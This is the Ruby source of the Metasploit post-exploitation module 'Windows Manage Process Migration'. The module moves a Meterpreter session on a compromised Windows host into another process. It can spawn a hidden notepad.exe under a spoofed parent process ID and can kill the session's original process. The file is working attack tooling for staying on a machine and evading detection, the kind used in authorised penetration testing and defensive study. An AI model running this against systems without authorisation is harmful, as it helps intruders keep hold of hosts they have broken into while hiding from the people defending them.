GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/manage/migrate.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
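class MetasploitModule < Msf::Post
  include Msf::Post::Common
  include Msf::Post::Windows::Process

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Manage Process Migration',
        'Description' => %q{
          This module will migrate a Meterpreter session from one process
          to another. A given process PID to migrate to or the module can spawn one and
          migrate to that newly spawned process.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Carlos Perez <carlos_perez[at]darkoperator.com>',
          'phra <https://iwantmore.pizza>'
        ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              core_migrate
              stdapi_sys_config_getenv
              stdapi_sys_process_attach
              stdapi_sys_process_execute
              stdapi_sys_process_kill
            ]
          }
        },
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [CONFIG_CHANGES],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptBool.new('SPAWN', [false, 'Spawn process to migrate to. If set, notepad.exe is used.', true]),
        OptInt.new('PID', [false, 'PID of process to migrate to.', 0]),
        OptInt.new('PPID', [false, 'Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing).', 0]),
        OptString.new('PPID_NAME', [false, 'Name of process for PPID spoofing when creating a new process.']),
        OptString.new('NAME', [false, 'Name of process to migrate to.']),
        OptBool.new('KILL', [false, 'Kill original process for the session.', false])
      ]
    )
  end

  # Module entry point.
  #
  # Resolves the PID to migrate into (see #select_target_pid), migrates the
  # session there and, when KILL is set, kills the process the session
  # originally lived in. The kill is only attempted after a successful
  # migration: the original process still hosts the session when migration
  # fails, so killing it would tear the session down.
  #
  # @return [void]
  def run
    hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']
    print_status("Running module against #{hostname} (#{session.session_host})")

    # Remember the process currently hosting the session so it can be
    # killed afterwards if requested.
    server = session.sys.process.open
    original_pid = server.pid
    print_status("Current server process: #{server.name} (#{server.pid})")

    target_pid = select_target_pid
    if target_pid.nil?
      print_error('No target process to migrate into (set SPAWN, PID or NAME)')
      return
    end
    unless has_pid?(target_pid)
      print_error("Process #{target_pid} not found")
      return
    end

    migrated = false
    begin
      print_status("Migrating into #{target_pid}")
      session.core.migrate(target_pid)
      migrated = true
      print_good("Successfully migrated into process #{target_pid}")
    rescue StandardError => e
      print_error('Could not migrate into process')
      print_error("Exception: #{e.class} : #{e}")
    end

    return unless datastore['KILL']

    unless migrated
      # The session is still running inside original_pid at this point.
      print_warning("Not killing original process #{original_pid} because the migration failed")
      return
    end

    kill_original_process(original_pid)
  end

  # Creates a temp notepad.exe to migrate to depending the architecture.
  #
  # The parent used for the new process is the PID of PPID_NAME when that
  # name resolves to a running process, otherwise PPID (0 = no spoofing).
  # NOTE(review): a PPID_NAME that matches no running process silently
  # falls back to PPID instead of being reported.
  #
  # @return [Integer, nil] PID of the spawned process, or nil when the
  #   requested parent PID is not running
  def create_temp_proc
    target_ppid = session.sys.process[datastore['PPID_NAME']] || datastore['PPID']
    cmd = get_notepad_pathname(client.arch, client.sys.config.getenv('windir'), client.arch)

    print_status('Spawning notepad.exe process to migrate into')

    if (target_ppid != 0) && !has_pid?(target_ppid)
      print_error("Process #{target_ppid} not found")
      return
    end

    print_status("Spoofing PPID #{target_ppid}") if has_pid?(target_ppid)

    # Run hidden; ParentPid is passed through as resolved above.
    spawned = session.sys.process.execute(cmd, nil, {
      'Hidden' => true,
      'ParentPid' => target_ppid
    })

    spawned.pid
  end

  private

  # Resolves the migration target from the datastore.
  #
  # Precedence is SPAWN, then PID, then NAME. Because SPAWN defaults to
  # true, PID and NAME are only consulted once SPAWN has been set to false.
  #
  # @return [Integer, nil] target PID, or nil when nothing usable was given
  def select_target_pid
    if datastore['SPAWN'] && (datastore['SPAWN'] != '')
      create_temp_proc
    elsif datastore['PID'] && (datastore['PID'] != 0)
      datastore['PID']
    elsif datastore['NAME'] && (datastore['NAME'] != '')
      session.sys.process[datastore['NAME']]
    end
  end

  # Kills the process the session was migrated out of, if it still exists.
  #
  # @param original_pid [Integer] PID recorded before the migration
  # @return [void]
  def kill_original_process(original_pid)
    print_status("Killing original process with PID #{original_pid}")
    if has_pid?(original_pid)
      session.sys.process.kill(original_pid)
      print_good("Successfully killed process with PID #{original_pid}")
    else
      print_warning("PID #{original_pid} exited on its own")
    end
  end
end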